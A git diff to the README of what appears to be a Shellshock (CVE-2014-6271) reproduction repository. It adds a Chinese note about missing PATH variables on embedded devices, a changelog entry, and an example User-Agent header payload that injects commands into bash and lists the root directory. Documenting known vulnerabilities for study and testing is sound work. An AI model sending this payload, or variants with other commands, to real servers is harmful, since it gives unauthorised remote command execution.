diff --git a/b/bash/shellshock1_CVE-2014-6271/README.md b/b/bash/shellshock1_CVE-2014-6271/README.md index 74bf589..aec5c86 100644 --- a/b/bash/shellshock1_CVE-2014-6271/README.md +++ b/b/bash/shellshock1_CVE-2014-6271/README.md @@ -45,8 +45,20 @@ Accept-Language: zh-CN,zh;q=0.8,en;q=0.6 ``` +> 注意:部分嵌入式设备的环境变量未设置会导致一些命令需要使用绝对路径,可在执行命令前导入环境变量 + +eg: + +``` +User-Agent: () { :;};echo ; echo; export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; echo $(/bin/ls -al /); +``` + ### 改动日志 +20170103 + + * 添加 PATH 说明 + 20160731 - * 修正资源为本地路径 \ No newline at end of file + * 修正资源为本地路径